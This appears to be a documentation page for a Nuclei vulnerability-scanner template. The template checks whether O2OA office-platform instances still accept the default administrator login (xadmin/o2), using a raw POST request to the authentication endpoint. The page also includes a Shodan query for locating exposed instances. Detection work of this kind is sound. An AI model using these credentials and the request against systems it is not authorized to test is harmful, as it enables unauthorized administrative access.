O2OA - Default Login
ID: o2oa-default-login
Severity: high
Author: SleepingBag945
Tags: o2oa,default-login
Description
Section titled “Description”O2OA is an open source and free enterprise and team office platform. It provides four major platforms portal management, process management, information management, and data management. It integrates many functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration. Meet various management and collaboration needs of enterprises.
YAML Source
Section titled “YAML Source”id: o2oa-default-login
info: name: O2OA - Default Login author: SleepingBag945 severity: high description: | O2OA is an open source and free enterprise and team office platform. It provides four major platforms portal management, process management, information management, and data management. It integrates many functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration. Meet various management and collaboration needs of enterprises. classification: cpe: cpe:2.3:a:zoneland:o2oa:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: zoneland product: o2oa shodan-query: title=="O2OA" tags: o2oa,default-login
http: - raw: - | POST /x_organization_assemble_authentication/jaxrs/authentication/captcha HTTP/1.1 Host: {{Hostname}} Cookie: x-token=anonymous Authorization: anonymous Accept: text/html,application/json,*/* Content-Type: application/json; charset=UTF-8
{"credential":"{{username}}","password":"{{password}}"}
payloads: username: - 'xadmin' password: - 'o2' attack: pitchfork
matchers-condition: and matchers: - type: word part: body words: - "\"type\": \"success\"" - "distinguishedName" condition: and
- type: word part: header words: - "application/json"
- type: status status: - 200# digest: 4b0a00483046022100ecbeba5597c639357fa280520ab194f0b8c7043c61a4c7974e7718e6ae00d59c022100ca22d4eaa7908696b5135edb2ed551fbfac70d7eb600a77b62016b6876dc9e92:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/default-logins/o2oa/o2oa-default-login.yaml"